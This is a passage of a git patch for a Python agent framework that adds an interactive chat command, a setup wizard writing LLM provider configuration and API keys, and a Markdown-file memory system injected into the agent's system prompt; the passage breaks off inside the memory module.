From 045fecd4cee49f04dc7b693c14d35ca38a0d92cb Mon Sep 17 00:00:00 2001 From: chiguyong Date: Tue, 9 Jun 2026 01:06:45 +0800 Subject: [PATCH] feat(tools): add ShellTool + WebSearchTool, memory system, onboarding wizard, chat mode MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - ShellTool: safe command execution with allowlist, blocked patterns (regex), timeout, output truncation - WebSearchTool: multi-backend search with Tavily → Serper → DuckDuckGo Lite fallback - MemoryTool: agent-callable tool with add/replace/remove/read actions - MemoryStore/MemoryFile: file-based memory (SOUL.md, USER.md, MEMORY.md, DAILY.md) - Onboarding wizard: provider selection, API key, model selection, agent personality - Chat mode: interactive CLI with streaming, memory injection, tool integration - Add 百炼 Coding Plan provider with 10 models - 102 unit tests (34 new for ShellTool + WebSearchTool) --- src/agentkit/cli/chat.py | 375 +++++++++++++++++++++ src/agentkit/cli/main.py | 15 + src/agentkit/cli/onboarding.py | 316 +++++++++++++++++ src/agentkit/memory/__init__.py | 4 + src/agentkit/memory/profile.py | 294 ++++++++++++++++ src/agentkit/tools/__init__.py | 6 + src/agentkit/tools/memory_tool.py | 117 +++++++ src/agentkit/tools/shell.py | 233 +++++++++++++ src/agentkit/tools/web_search.py | 254 ++++++++++++++ tests/unit/test_chat_memory_integration.py | 102 ++++++ tests/unit/test_memory_profile.py | 249 ++++++++++++++ tests/unit/test_memory_tool.py | 112 ++++++ tests/unit/test_onboarding.py | 216 ++++++++++++ tests/unit/test_shell_tool.py | 155 +++++++++ tests/unit/test_web_search_tool.py | 172 ++++++++++ 15 files changed, 2620 insertions(+) create mode 100644 src/agentkit/cli/chat.py create mode 100644 src/agentkit/cli/onboarding.py create mode 100644 src/agentkit/memory/profile.py create mode 100644 src/agentkit/tools/memory_tool.py create mode 100644 src/agentkit/tools/shell.py create mode 100644 src/agentkit/tools/web_search.py create mode 100644 tests/unit/test_chat_memory_integration.py create mode 100644 tests/unit/test_memory_profile.py create mode 100644 tests/unit/test_memory_tool.py create mode 100644 tests/unit/test_onboarding.py create mode 100644 tests/unit/test_shell_tool.py create mode 100644 tests/unit/test_web_search_tool.py diff --git a/src/agentkit/cli/chat.py b/src/agentkit/cli/chat.py new file mode 100644 index 0000000..074be1e --- /dev/null +++ b/src/agentkit/cli/chat.py @@ -0,0 +1,375 @@ +"""Chat command — interactive terminal chat with an Agent. + +Runs a lightweight in-process server and opens a REPL-style chat session. +No external server or Docker needed. + +Usage: + agentkit chat # Start chatting (auto-onboard if no config) + agentkit chat --model deepseek/deepseek-chat # Use specific model +""" + +from __future__ import annotations + +import asyncio +import os +from typing import Any + +import typer +from rich import print as rprint +from rich.panel import Panel +from rich.prompt import Prompt +from rich.markdown import Markdown +from rich.live import Live +from rich.text import Text +from rich.console import Group + + +def chat( + model: str = typer.Option("default", "--model", "-m", help="LLM model to use (e.g. deepseek/deepseek-chat)"), + agent_name: str = typer.Option("default", "--agent", "-a", help="Agent name to chat with"), + config: str | None = typer.Option(None, "--config", "-c", help="Path to agentkit.yaml"), + system_prompt: str | None = typer.Option(None, "--system-prompt", "-s", help="Custom system prompt"), + no_stream: bool = typer.Option(False, "--no-stream", help="Disable token streaming"), +): + """Start an interactive chat session with an Agent.""" + asyncio.run(_chat_async(model, agent_name, config, system_prompt, no_stream)) + + +async def _chat_async( + model: str, + agent_name: str, + config_arg: str | None, + system_prompt: str | None, + no_stream: bool, +) -> None: + """Async implementation of the chat command.""" + from agentkit.cli.onboarding import run_onboarding + from agentkit.server.config import ServerConfig, find_config_path + + # ── Onboarding check ────────────────────────────────────────── + config_path = find_config_path(config_arg) + if config_path is None: + config_path = run_onboarding(config_arg=config_arg) + if config_path is None: + rprint("[red]Onboarding cancelled. Cannot start chat without configuration.[/red]") + raise typer.Exit(code=1) + + # ── Load config ─────────────────────────────────────────────── + rprint(f"[dim]Loading config from {config_path}[/dim]") + + # Load .env + from pathlib import Path + dotenv = Path(config_path).parent / ".env" + if dotenv.exists(): + _load_dotenv(str(dotenv)) + + server_config = ServerConfig.from_yaml(config_path) + + # ── Build in-process components ─────────────────────────────── + from agentkit.session.manager import SessionManager + from agentkit.session.store import InMemorySessionStore + from agentkit.session.models import MessageRole + from agentkit.core.react import ReActEngine + from agentkit.tools.base import Tool + from agentkit.memory.profile import MemoryStore + from agentkit.tools.memory_tool import MemoryTool + from agentkit.tools.shell import ShellTool + from agentkit.tools.web_search import WebSearchTool + from agentkit.tools.web_crawl import WebCrawlTool + + # Build LLM Gateway + gateway = _build_gateway(server_config) + + # Initialize memory store + memory_store = MemoryStore() + memory_store.ensure_defaults() + memory_snapshot = memory_store.load_all() + + # Create session + session_manager = SessionManager(store=InMemorySessionStore()) + session = await session_manager.create_session(agent_name=agent_name) + + # Build tools list — all available tools for chat mode + search_api_keys = _extract_search_keys(server_config) + tools: list[Tool] = [ + MemoryTool(memory_store=memory_store), + ShellTool(working_dir=os.getcwd()), + WebSearchTool(**search_api_keys), + WebCrawlTool(), + ] + + # Build system prompt — inject memory into system prompt + base_prompt = system_prompt or ( + "You are a helpful AI assistant. " + "Remember the context of our conversation and refer back to earlier messages. " + "Respond clearly and concisely." + ) + effective_system_prompt = memory_store.build_system_prompt(memory_snapshot, base_prompt) + + # Resolve agent display name from SOUL.md + agent_display_name = memory_store.get_file("soul").read_section("身份") or agent_name + # Extract just the name (first line after "我是") + for prefix in ["我是", "我叫", "我的名字是"]: + if prefix in agent_display_name: + name_part = agent_display_name.split(prefix, 1)[1].strip() + # Take first meaningful token (before comma, period, etc.) + for sep in [",", "。", "、", ",", ".", " "]: + if sep in name_part: + name_part = name_part.split(sep)[0] + break + agent_display_name = name_part + break + + # ── Welcome banner ──────────────────────────────────────────── + effective_model = model if model != "default" else _resolve_default_model(server_config) + rprint(Panel( + f"[bold]AgentKit Chat[/bold]\n\n" + f" Model: [cyan]{effective_model}[/cyan]\n" + f" Agent: [cyan]{agent_display_name}[/cyan]\n" + f" Session: [dim]{session.session_id[:8]}...[/dim]\n\n" + f" Type your message and press Enter.\n" + f" [dim]/help[/dim] — Show commands\n" + f" [dim]/clear[/dim] — Clear conversation\n" + f" [dim]/model [/dim] — Switch model\n" + f" [dim]/quit[/dim] — Exit chat", + title="AgentKit", + border_style="bright_blue", + )) + + # ── Chat loop ───────────────────────────────────────────────── + react_engine = ReActEngine(llm_gateway=gateway) + current_model = effective_model + conversation_had_messages = False + + while True: + try: + user_input = Prompt.ask("\n[bold green]You[/bold green]") + except (EOFError, KeyboardInterrupt): + rprint("\n[dim]Goodbye![/dim]") + break + + if not user_input.strip(): + continue + + # Handle commands + if user_input.startswith("/"): + cmd = user_input.strip().lower() + if cmd in ("/quit", "/q", "/exit"): + rprint("[dim]Goodbye![/dim]") + break + elif cmd == "/help": + _print_help() + continue + elif cmd == "/clear": + # Create a new session (memory files persist) + session = await session_manager.create_session(agent_name=agent_name) + rprint("[dim]Conversation cleared. New session started.[/dim]") + continue + elif cmd.startswith("/model "): + current_model = cmd.split(" ", 1)[1].strip() + rprint(f"[dim]Switched to model: {current_model}[/dim]") + continue + else: + rprint(f"[yellow]Unknown command: {cmd}[/yellow]") + continue + + conversation_had_messages = True + + # Append user message to session + await session_manager.append_message( + session_id=session.session_id, + role=MessageRole.USER, + content=user_input, + ) + + # Get full conversation history (includes all previous turns) + chat_messages = await session_manager.get_chat_messages(session.session_id) + + # Print Agent label before streaming + rprint(f"\n[bold blue]{agent_display_name}[/bold blue]: ", end="") + + # Execute Agent + try: + if no_stream: + # Non-streaming mode + result = await react_engine.execute( + messages=chat_messages, + tools=tools, + model=current_model, + agent_name=agent_name, + system_prompt=effective_system_prompt, + ) + output = result.output if hasattr(result, "output") else str(result) + rprint(output) + + await session_manager.append_message( + session_id=session.session_id, + role=MessageRole.ASSISTANT, + content=output, + agent_name=agent_name, + ) + else: + # Streaming mode — Live displays under the "Agent:" label + full_content = "" + with Live( + Text(""), + refresh_per_second=15, + vertical_overflow="visible", + transient=False, # Keep final output on screen + ) as live: + async for event in react_engine.execute_stream( + messages=chat_messages, + tools=tools, + model=current_model, + agent_name=agent_name, + system_prompt=effective_system_prompt, + ): + if event.event_type == "token": + token = event.data.get("content", "") + full_content += token + live.update(Text(full_content)) + elif event.event_type == "final_answer": + # Use final_answer output (may differ slightly from accumulated tokens) + full_content = event.data.get("output", full_content) + live.update(Markdown(full_content)) + elif event.event_type == "tool_call": + tool_name = event.data.get("tool_name", "unknown") + live.update(Text(f"[calling tool: {tool_name}...]")) + elif event.event_type == "tool_result": + # After tool result, show accumulated content again + if full_content: + live.update(Text(full_content)) + + # Live already displayed the final content, no need to rprint again + + await session_manager.append_message( + session_id=session.session_id, + role=MessageRole.ASSISTANT, + content=full_content, + agent_name=agent_name, + ) + + except Exception as e: + rprint(f"\n[red]Error: {e}[/red]") + + # ── Session end: generate daily log ──────────────────────────── + if conversation_had_messages: + try: + messages = await session_manager.get_messages(session.session_id) + if messages: + # Build a brief summary of the conversation + summary_parts = [] + for msg in messages[-10:]: # Last 10 messages + role = msg.role.value if hasattr(msg.role, "value") else str(msg.role) + summary_parts.append(f"{role}: {msg.content[:100]}") + summary = "\n".join(summary_parts) + + daily = memory_store.get_file("daily") + existing = daily.read() + new_entry = f"## 会话摘要\n{summary}" + if existing: + daily.write(f"{existing}\n\n{new_entry}") + else: + daily.write(new_entry) + + # Archive old daily logs + memory_store.archive_old_dailies(keep_days=2) + except Exception: + pass # Daily log generation is best-effort + + +def _extract_search_keys(server_config: "ServerConfig") -> dict[str, str]: + """Extract search API keys from server config environment.""" + return { + "tavily_api_key": os.environ.get("TAVILY_API_KEY"), + "serper_api_key": os.environ.get("SERPER_API_KEY"), + } + + +def _build_gateway(server_config: "ServerConfig") -> "LLMGateway": + """Build LLMGateway from ServerConfig, same logic as app.py.""" + from agentkit.llm.gateway import LLMGateway + from agentkit.llm.providers.anthropic import AnthropicProvider + from agentkit.llm.providers.gemini import GeminiProvider + from agentkit.llm.providers.openai import OpenAICompatibleProvider + + gateway = LLMGateway(config=server_config.llm_config) + + for name, pconf in server_config.llm_config.providers.items(): + if not pconf.api_key: + continue + try: + if pconf.type == "anthropic": + provider = AnthropicProvider( + api_key=pconf.api_key, + model=list(pconf.models.keys())[0] if pconf.models else "claude-sonnet-4-20250514", + max_tokens=pconf.max_tokens, + base_url=pconf.base_url or "https://api.anthropic.com", + timeout=pconf.timeout, + ) + elif pconf.type == "gemini": + provider = GeminiProvider( + api_key=pconf.api_key, + model=list(pconf.models.keys())[0] if pconf.models else "gemini-2.0-flash", + max_output_tokens=pconf.max_tokens, + base_url=pconf.base_url or "https://generativelanguage.googleapis.com", + timeout=pconf.timeout, + ) + else: + provider = OpenAICompatibleProvider( + api_key=pconf.api_key, + base_url=pconf.base_url, + ) + gateway.register_provider(name, provider) + except Exception as e: + import logging + logging.getLogger(__name__).warning(f"Failed to register LLM provider '{name}': {e}") + + return gateway + + +def _resolve_default_model(server_config: "ServerConfig") -> str: + """Resolve the default model from config.""" + if server_config.llm_config.model_aliases and "default" in server_config.llm_config.model_aliases: + return server_config.llm_config.model_aliases["default"] + # Fallback: first provider's first model + for name, pconf in server_config.llm_config.providers.items(): + if pconf.api_key and pconf.models: + first_model = list(pconf.models.keys())[0] + return f"{name}/{first_model}" + return "default" + + +def _load_dotenv(dotenv_path: str) -> None: + """Load .env file into environment.""" + from pathlib import Path + path = Path(dotenv_path) + if not path.exists(): + return + with open(path, encoding="utf-8") as f: + for line in f: + line = line.strip() + if not line or line.startswith("#"): + continue + if "=" not in line: + continue + key, _, value = line.partition("=") + key = key.strip() + value = value.strip().strip("\"'") + if key and key not in os.environ: + os.environ[key] = value + + +def _print_help() -> None: + """Print chat command help.""" + rprint(Panel( + "[bold]Chat Commands[/bold]\n\n" + " [cyan]/help[/cyan] — Show this help\n" + " [cyan]/clear[/cyan] — Clear conversation (new session)\n" + " [cyan]/model [/cyan] — Switch LLM model\n" + " [cyan]/quit[/cyan] — Exit chat\n\n" + "[bold]Tips[/bold]\n\n" + " • Multi-line input: end a line with [cyan]\\[/cyan] to continue\n" + " • Your conversation is stored in memory for the session", + border_style="dim", + )) diff --git a/src/agentkit/cli/main.py b/src/agentkit/cli/main.py index 5672118..73403c3 100644 --- a/src/agentkit/cli/main.py +++ b/src/agentkit/cli/main.py @@ -26,6 +26,9 @@ app.command(name="usage")(usage) from agentkit.cli.pair import pair # noqa: E402 app.command(name="pair")(pair) +from agentkit.cli.chat import chat # noqa: E402 +app.command(name="chat")(chat) + @app.command() def serve( @@ -41,10 +44,22 @@ def serve( import uvicorn from agentkit.server.config import ServerConfig, find_config_path + from agentkit.cli.onboarding import needs_onboarding, run_onboarding # Load .env file if present config_path = find_config_path(config) + # Onboarding check + if config_path is None: + rprint("[yellow]No agentkit.yaml found.[/yellow]") + from rich.prompt import Confirm + if Confirm.ask("Would you like to run the setup wizard?", default=True): + config_path = run_onboarding(config_arg=config) + if config_path is None: + rprint("[red]Setup cancelled. Using defaults.[/red]") + else: + rprint("[dim]Using default configuration (no LLM providers).[/dim]") + if config_path: rprint(f"[green]Loading config from {config_path}[/green]") server_config = ServerConfig.from_yaml(config_path) diff --git a/src/agentkit/cli/onboarding.py b/src/agentkit/cli/onboarding.py new file mode 100644 index 0000000..35b5807 --- /dev/null +++ b/src/agentkit/cli/onboarding.py @@ -0,0 +1,316 @@ +"""Onboarding flow — interactive first-time configuration wizard. + +When no agentkit.yaml exists, this wizard guides the user through: +1. Choosing an LLM provider +2. Entering API key +3. Selecting a default model +4. Generating agentkit.yaml + .env +""" + +from __future__ import annotations + +import os +from pathlib import Path +from typing import Any + +import yaml +from rich.panel import Panel +from rich.prompt import Prompt, Confirm +from rich import print as rprint + +from agentkit.server.config import find_config_path + + +# ── Provider presets ────────────────────────────────────────────────── + +PROVIDER_PRESETS: dict[str, dict[str, Any]] = { + "deepseek": { + "name": "DeepSeek", + "env_key": "DEEPSEEK_API_KEY", + "base_url": "https://api.deepseek.com/v1", + "type": "openai", + "models": { + "deepseek-chat": {"alias": "default"}, + "deepseek-reasoner": {"alias": "reasoning"}, + }, + "default_model": "deepseek-chat", + }, + "openai": { + "name": "OpenAI", + "env_key": "OPENAI_API_KEY", + "base_url": "https://api.openai.com/v1", + "type": "openai", + "models": { + "gpt-4o": {"alias": "default"}, + "gpt-4o-mini": {"alias": "fast"}, + }, + "default_model": "gpt-4o", + }, + "bailian-coding": { + "name": "百炼 Coding Plan", + "env_key": "DASHSCOPE_API_KEY", + "base_url": "https://coding.dashscope.aliyuncs.com/v1", + "type": "openai", + "models": { + "qwen3.7-plus": {"alias": "default"}, + "qwen3.6-plus": {}, + "qwen3.5-plus": {}, + "qwen3-max-2026-01-23": {}, + "qwen3-coder-plus": {"alias": "coder"}, + "qwen3-coder-next": {}, + "kimi-k2.5": {}, + "glm-5": {}, + "glm-4.7": {}, + "MiniMax-M2.5": {}, + }, + "default_model": "qwen3.7-plus", + }, + "qwen": { + "name": "通义千问 (Qwen/DashScope)", + "env_key": "DASHSCOPE_API_KEY", + "base_url": "https://dashscope.aliyuncs.com/compatible-mode/v1", + "type": "openai", + "models": { + "qwen-plus": {"alias": "default"}, + "qwen-turbo": {"alias": "fast"}, + }, + "default_model": "qwen-plus", + }, + "doubao": { + "name": "豆包 (Doubao)", + "env_key": "DOUBAO_API_KEY", + "base_url": "https://ark.cn-beijing.volces.com/api/v3", + "type": "openai", + "models": { + "doubao-pro-32k": {"alias": "default"}, + }, + "default_model": "doubao-pro-32k", + }, + "gemini": { + "name": "Google Gemini", + "env_key": "GEMINI_API_KEY", + "base_url": "https://generativelanguage.googleapis.com", + "type": "gemini", + "models": { + "gemini-2.0-flash": {"alias": "default"}, + }, + "default_model": "gemini-2.0-flash", + }, + "anthropic": { + "name": "Anthropic Claude", + "env_key": "ANTHROPIC_API_KEY", + "base_url": "https://api.anthropic.com", + "type": "anthropic", + "models": { + "claude-sonnet-4-20250514": {"alias": "default"}, + }, + "default_model": "claude-sonnet-4-20250514", + }, +} + + +def needs_onboarding(config_arg: str | None = None) -> bool: + """Check if onboarding is needed (no config file found).""" + return find_config_path(config_arg) is None + + +def run_onboarding( + output_dir: str = ".", + config_arg: str | None = None, +) -> str | None: + """Run the interactive onboarding wizard. + + Returns: + Path to the generated config file, or None if cancelled. + """ + rprint(Panel( + "[bold]Welcome to AgentKit![/bold]\n\n" + "No configuration file found. Let's set up your first Agent.\n" + "This will create [cyan]agentkit.yaml[/cyan] and [cyan].env[/cyan] for you.", + title="AgentKit Setup", + border_style="bright_blue", + )) + + output_path = Path(output_dir).resolve() + output_path.mkdir(parents=True, exist_ok=True) + + # ── Step 1: Choose LLM provider ────────────────────────────── + rprint("\n[bold]Step 1: Choose your LLM provider[/bold]") + provider_keys = list(PROVIDER_PRESETS.keys()) + for i, key in enumerate(provider_keys, 1): + preset = PROVIDER_PRESETS[key] + rprint(f" [cyan]{i}[/cyan]. {preset['name']}") + + choice = Prompt.ask( + "\nSelect a provider", + choices=[str(i) for i in range(1, len(provider_keys) + 1)], + default="1", + ) + selected_key = provider_keys[int(choice) - 1] + preset = PROVIDER_PRESETS[selected_key] + + rprint(f"\n[green]Selected: {preset['name']}[/green]") + + # ── Step 2: Enter API key ───────────────────────────────────── + rprint(f"\n[bold]Step 2: Enter your API key[/bold]") + rprint(f"You can get one from the {preset['name']} dashboard.") + api_key = Prompt.ask( + f" {preset['env_key']}", + password=True, + ) + + if not api_key.strip(): + rprint("[red]API key is required. Onboarding cancelled.[/red]") + return None + + # ── Step 2b: Select default model ──────────────────────────── + available_models = list(preset["models"].keys()) + if len(available_models) > 1: + rprint(f"\n[bold]Step 2b: Select your default model[/bold]") + for i, model in enumerate(available_models, 1): + alias = preset["models"][model].get("alias", "") + alias_str = f" [dim]({alias})[/dim]" if alias else "" + recommended = " [green]← recommended[/green]" if model == preset.get("default_model") else "" + rprint(f" [cyan]{i}[/cyan]. {model}{alias_str}{recommended}") + model_choice = Prompt.ask( + "Select default model", + choices=[str(i) for i in range(1, len(available_models) + 1)], + default=str(available_models.index(preset.get("default_model", available_models[0])) + 1), + ) + selected_model = available_models[int(model_choice) - 1] + # Rebuild models dict: selected model gets "default" alias + updated_models: dict[str, Any] = {} + for model, conf in preset["models"].items(): + if model == selected_model: + updated_models[model] = {**conf, "alias": "default"} + else: + # Remove "default" alias from other models + updated_models[model] = {k: v for k, v in conf.items() if k != "alias" or v != "default"} + preset = {**preset, "models": updated_models} + rprint(f"[green]Selected: {selected_model}[/green]") + else: + selected_model = available_models[0] + + # ── Step 3: Optional — add a second provider ───────────────── + env_vars: dict[str, str] = {preset["env_key"]: api_key.strip()} + providers_config: dict[str, Any] = { + selected_key: { + "api_key": f"${{{preset['env_key']}}}", + "base_url": preset["base_url"], + "type": preset["type"], + "models": preset["models"], + } + } + model_aliases: dict[str, str] = {alias: f"{selected_key}/{model}" for model, conf in preset["models"].items() if (alias := conf.get("alias"))} + + if Confirm.ask("\nWould you like to add a second LLM provider (for fallback)?", default=False): + remaining = [k for k in provider_keys if k != selected_key] + for i, key in enumerate(remaining, 1): + rprint(f" [cyan]{i}[/cyan]. {PROVIDER_PRESETS[key]['name']}") + choice2 = Prompt.ask( + "Select second provider (or press Enter to skip)", + choices=[str(i) for i in range(1, len(remaining) + 1)] + [""], + default="", + ) + if choice2: + key2 = remaining[int(choice2) - 1] + preset2 = PROVIDER_PRESETS[key2] + api_key2 = Prompt.ask(f" {preset2['env_key']}", password=True) + if api_key2.strip(): + env_vars[preset2["env_key"]] = api_key2.strip() + providers_config[key2] = { + "api_key": f"${{{preset2['env_key']}}}", + "base_url": preset2["base_url"], + "type": preset2["type"], + "models": preset2["models"], + } + for model, conf in preset2["models"].items(): + alias = conf.get("alias") + if alias and alias not in model_aliases: + model_aliases[alias] = f"{key2}/{model}" + + # ── Step 4: Generate config files ───────────────────────────── + rprint("\n[bold]Step 3: Generating configuration...[/bold]") + + config = { + "server": { + "host": "0.0.0.0", + "port": 8001, + "workers": 1, + "rate_limit": 60, + }, + "llm": { + "providers": providers_config, + "model_aliases": model_aliases, + }, + "session": { + "backend": "memory", + }, + "bus": { + "backend": "memory", + }, + "task_store": { + "backend": "memory", + }, + "skills": { + "auto_discover": True, + "paths": ["./skills"], + }, + "logging": { + "level": "INFO", + "format": "text", + }, + } + + # Write agentkit.yaml + config_path = output_path / "agentkit.yaml" + with open(config_path, "w", encoding="utf-8") as f: + yaml.dump(config, f, default_flow_style=False, allow_unicode=True, sort_keys=False) + rprint(f" [green]Created:[/green] {config_path}") + + # Write .env + env_path = output_path / ".env" + env_lines = [f"{k}={v}" for k, v in env_vars.items()] + with open(env_path, "w", encoding="utf-8") as f: + f.write("# AgentKit Environment Variables\n") + f.write("# Generated by onboarding wizard\n\n") + f.write("\n".join(env_lines) + "\n") + rprint(f" [green]Created:[/green] {env_path}") + + # ── Step 4: Agent personality (optional) ────────────────────── + rprint("\n[bold]Step 4: Customize your Agent (optional)[/bold]") + rprint(" Press Enter to use defaults, or type your preferences.") + + agent_name = Prompt.ask(" Agent name", default="AgentKit") + personality = Prompt.ask(" Personality", default="专业、友好、注重细节") + speaking_style = Prompt.ask(" Speaking style", default="简洁清晰") + + # Create SOUL.md + from agentkit.memory.profile import MemoryStore + memory_store = MemoryStore(base_dir=Path.home() / ".agentkit") + soul_content = f"""## 身份 +我是{agent_name},一个专业的 AI 助手。 + +## 性格 +{personality} + +## 说话方式 +{speaking_style} + +## 做事准则 +- 准确回答用户问题 +- 主动记住用户提到的偏好和信息 +- 不确定时坦诚说明 +""" + memory_store.get_file("soul").write(soul_content.strip()) + rprint(f" [green]Created:[/green] ~/.agentkit/SOUL.md") + + rprint(Panel( + "[bold green]Setup complete![/bold green]\n\n" + "You can now run:\n" + " [cyan]agentkit chat[/cyan] — Start chatting with your Agent\n" + " [cyan]agentkit serve[/cyan] — Start the API server", + border_style="green", + )) + + return str(config_path) diff --git a/src/agentkit/memory/__init__.py b/src/agentkit/memory/__init__.py index 1d1ec20..66bf3f7 100644 --- a/src/agentkit/memory/__init__.py +++ b/src/agentkit/memory/__init__.py @@ -14,6 +14,7 @@ from agentkit.memory.query_transformer import ( TransformedQuery, create_query_transformer, ) +from agentkit.memory.profile import MemoryFile, MemoryStore, MemorySnapshot __all__ = [ "Memory", @@ -29,4 +30,7 @@ __all__ = [ "NoOpQueryTransformer", "TransformedQuery", "create_query_transformer", + "MemoryFile", + "MemoryStore", + "MemorySnapshot", ] diff --git a/src/agentkit/memory/profile.py b/src/agentkit/memory/profile.py new file mode 100644 index 0000000..9f34c02 --- /dev/null +++ b/src/agentkit/memory/profile.py @@ -0,0 +1,294 @@ +"""分层记忆系统 — SOUL/USER/MEMORY/DAILY 文件管理. + +参考 Hermes/OpenClaw 架构,实现 Agent 人格、用户档案、工作笔记、 +日志的持久化存储与 system prompt 注入。 +""" + +from __future__ import annotations + +import re +from dataclasses import dataclass, field +from datetime import datetime, timezone +from pathlib import Path +from typing import Any + + +class MemoryFile: + """单个记忆文件的管理器,支持 section 级别 CRUD 和容量控制. + + 文件格式为 Markdown,使用 `## Section` 组织内容:: + + ## 身份 + 我是小王,一个专业的 AI 助手。 + + ## 性格 + 友好、耐心、注重细节 + + """ + + def __init__(self, path: Path, char_budget: int | None = None): + self.path = Path(path) + self.char_budget = char_budget + + def read(self) -> str: + """读取整个文件内容,文件不存在返回空字符串.""" + if not self.path.exists(): + return "" + return self.path.read_text(encoding="utf-8") + + def write(self, content: str) -> None: + """写入内容,自动创建父目录,超容量时自动裁剪.""" + self.path.parent.mkdir(parents=True, exist_ok=True) + self.path.write_text(content, encoding="utf-8") + if self.char_budget and len(content) > self.char_budget: + self.trim_to_budget() + + def read_section(self, name: str) -> str: + """读取指定 section 的内容(不含标题行).""" + content = self.read() + if not content: + return "" + # 匹配 ## name 后面的内容,直到下一个 ## 或文件末尾 + pattern = rf"^## {re.escape(name)}\s*\n(.*?)(?=^## |\Z)" + match = re.search(pattern, content, re.MULTILINE | re.DOTALL) + if match: + return match.group(1).strip() + return "" + + def add_section(self, name: str, content: str) -> None: + """追加内容到指定 section,不存在则创建.""" + existing = self.read() + section_content = self.read_section(name) + if section_content: + # 追加到已有 section + old_text = section_content + new_text = f"{old_text}\n{content}" + self.replace_section(name, old_text, new_text) + else: + # 创建新 section + new_section = f"\n## {name}\n{content}" + if existing and not existing.endswith("\n"): + new_section = "\n" + new_section + self.write(existing + new_section) + + def replace_section(self, name: str, old_text: str, new_text: str) -> bool: + """替换 section 内的文本,返回是否成功.""" + section_content = self.read_section(name) + if old_text not in section_content: + return False + full_content = self.read() + # 替换 section 内的文本 + pattern = rf"(^## {re.escape(name)}\s*\n)(.*?)(?=^## |\Z)" + match = re.search(pattern, full_content, re.MULTILINE | re.DOTALL) + if not match: + return False + original_section_body = match.group(2) + new_section_body = original_section_body.replace(old_text, new_text, 1) + updated = full_content[: match.start(2)] + new_section_body + full_content[match.end(2) :] + self.write(updated) + return True + + def remove_section(self, name: str) -> None: + """删除整个 section(含标题行).""" + content = self.read() + if not content: + return + pattern = rf"^## {re.escape(name)}\s*\n.*?(?=^## |\Z)" + new_content = re.sub(pattern, "", content, flags=re.MULTILINE | re.DOTALL).strip() + self.write(new_content) + + def list_sections(self) -> list[str]: + """列出所有 section 名称.""" + content = self.read() + if not content: + return [] + return re.findall(r"^## (.+)$", content, re.MULTILINE) + + def trim_to_budget(self) -> None: + """裁剪内容到容量上限,优先保留前面的 section.""" + if not self.char_budget: + return + content = self.read() + if len(content) <= self.char_budget: + return + # 从末尾裁剪,保留前面的 section + self.write(content[: self.char_budget]) + + +@dataclass +class MemorySnapshot: + """一次加载的所有记忆文件快照.""" + + soul: str = "" + user: str = "" + memory: str = "" + daily: str = "" + total_chars: int = 0 + + def is_empty(self) -> bool: + return not any([self.soul, self.user, self.memory, self.daily]) + + +# 容量上限常量(字符数) +SOUL_BUDGET = 2000 +USER_BUDGET = 1400 +MEMORY_BUDGET = 2200 +DAILY_BUDGET = 1000 # 每天日志上限 + +# 默认 SOUL.md 内容 +DEFAULT_SOUL = """## 身份 +我是 AgentKit,一个专业的 AI 助手。 + +## 性格 +专业、友好、注重细节 + +## 说话方式 +简洁清晰,偶尔使用比喻帮助理解 + +## 做事准则 +- 准确回答用户问题 +- 主动记住用户提到的偏好和信息 +- 不确定时坦诚说明 +""" + + +class MemoryStore: + """管理 SOUL/USER/MEMORY/DAILY 四类记忆文件. + + 存储路径:: + + base_dir/ + ├── SOUL.md + ├── memories/ + │ ├── USER.md + │ ├── MEMORY.md + │ └── daily/ + │ ├── 2026-06-07.md + │ └── 2026-06-08.md + + """ + + def __init__(self, base_dir: Path | str | None = None): + if base_dir is None: + base_dir = Path.home() / ".agentkit" + self.base_dir = Path(base_dir) + self.base_dir.mkdir(parents=True, exist_ok=True) + + # 初始化四个 MemoryFile + self._soul = MemoryFile(self.base_dir / "SOUL.md", char_budget=SOUL_BUDGET) + self._user = MemoryFile(self.base_dir / "memories" / "USER.md", char_budget=USER_BUDGET) + self._memory = MemoryFile(self.base_dir / "memories" / "MEMORY.md", char_budget=MEMORY_BUDGET) + self._daily_dir = self.base_dir / "memories" / "daily" + self._daily_dir.mkdir(parents=True, exist_ok=True) + + def get_file(self, file_key: str) -> MemoryFile: + """获取指定类型的 MemoryFile. + + Args: + file_key: "soul" | "user" | "memory" | "daily" + """ + mapping = { + "soul": self._soul, + "user": self._user, + "memory": self._memory, + } + if file_key in mapping: + return mapping[file_key] + if file_key == "daily": + # daily 返回今天的日志文件 + today = datetime.now(timezone.utc).strftime("%Y-%m-%d") + return MemoryFile(self._daily_dir / f"{today}.md", char_budget=DAILY_BUDGET) + raise ValueError(f"Invalid file_key: {file_key}. Must be soul/user/memory/daily") + + def ensure_defaults(self) -> None: + """首次运行时创建默认 SOUL.md.""" + if not self._soul.read(): + self._soul.write(DEFAULT_SOUL.strip()) + + def load_all(self) -> MemorySnapshot: + """加载所有记忆文件.""" + soul = self._soul.read() + user = self._user.read() + memory = self._memory.read() + daily = self.load_daily_logs() + total = len(soul) + len(user) + len(memory) + len(daily) + return MemorySnapshot( + soul=soul, + user=user, + memory=memory, + daily=daily, + total_chars=total, + ) + + def load_daily_logs(self, days: int = 2) -> str: + """加载最近 N 天的日志.""" + parts: list[str] = [] + for i in range(days): + from datetime import timedelta + + date = datetime.now(timezone.utc) - timedelta(days=i) + filename = f"{date.strftime('%Y-%m-%d')}.md" + daily_file = MemoryFile(self._daily_dir / filename) + content = daily_file.read() + if content: + parts.append(f"### {date.strftime('%Y-%m-%d')}\n{content}") + return "\n\n".join(parts) + + def archive_old_dailies(self, keep_days: int = 2) -> int: + """归档超过 N 天的日志(删除旧文件).""" + from datetime import timedelta + + count = 0 + cutoff = datetime.now(timezone.utc) - timedelta(days=keep_days) + if not self._daily_dir.exists(): + return 0 + for f in self._daily_dir.glob("*.md"): + # 从文件名解析日期 + try: + date_str = f.stem # e.g. "2026-06-07" + file_date = datetime.strptime(date_str, "%Y-%m-%d").replace(tzinfo=timezone.utc) + if file_date < cutoff: + f.unlink() + count += 1 + except ValueError: + continue + return count + + def build_system_prompt(self, snapshot: MemorySnapshot, base_prompt: str = "") -> str: + """将记忆注入 system prompt. + + 格式:: + + + [SOUL.md content] + + + + [USER.md content] + + + + [MEMORY.md content] + + + + [DAILY.md content] + + + [base_prompt] + """ + parts: list[str] = [] + + if snapshot.soul: + parts.append(f"\n{snapshot.soul}\n") + if snapshot.user: + parts.append(f"\n{snapshot.user}\n") + if snapshot.memory: + parts.append(f"\n{snapshot.memory}\n") + if snapshot.daily: + parts.append(f"\n{snapshot.daily}\n") + + if base_prompt: + 